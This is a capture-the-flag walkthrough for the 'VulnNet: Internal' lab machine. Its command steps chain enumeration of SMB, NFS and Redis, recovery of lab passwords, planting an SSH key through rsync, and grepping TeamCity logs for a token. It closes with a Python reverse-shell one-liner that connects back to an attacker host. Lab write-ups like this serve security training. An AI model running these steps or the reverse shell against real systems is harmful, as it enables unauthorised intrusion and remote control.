# VulnNet: Internal **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/139 - **NetBIOS** ``` nbtscan $VICTIM ```

### ### TCP/445 - **SMB** In SMB there is the first flag. **Kali** ``` smbget -R smb://$VICTIM/shares smbclient \\\\$VICTIM\\shares smb: \> cd temp smb: \temp\> get services.txt smb: \temp\> cd .. smb: \> cd data smb: \data\> get data.txt smb: \data\> get business-req.txt ```

### TCP/2049 - **NFS** **Kali** ``` showmount -e $VICTIM mkdir /mnt/nfs mount $VICTIM:/opt/conf /mnt/nfs cd /mnt/nfs cat redis/redis.conf ```

### TCP/6379 - Redis

**Kali** ``` redis-cli -h $VICTIM -a "B65Hx562F@ggAZ@F" 10.10.232.200:6379> KEYS * 10.10.232.200:6379> KEYS "internal flag" 10.10.232.200:6379> GET "internal flag" ```

**Kali** ``` KEYS "authlist" LRANGE authlist 1 100 ```

**Kali** ``` echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d ```

### TCP/873 - RSYNC We are able to transfer out key to allow us to login to as the sys-internal user. **Kali** ``` rsync --list-only rsync://$VICTIM rsync --list-only rsync://rsync-connect@$VICTIM/files Password: Hcg3HP67@TW@Bc72v ssh-keygen -t rsa cp ~/.ssh/id_rsa.pub authorized_keys rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh Password: Hcg3HP67@TW@Bc72v ``` ### TCP/22 - SSH **Kali** ``` ssh sys-internal@$VICTIM ``` **Victim** ``` ss -ltp ```

**Kali** ``` ssh -D 9050 sys-internal@$VICTIM ```

Add the token in the Authentication token. There was multiple listed, it was the last one **Victim** ``` grep -iR token /TeamCity/logs/ 2>/dev/null ```

**Kali** ``` nc -lvnp 1337 ``` **Custom script** ``` export RHOST="$KALI";export RPORT=1337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' ```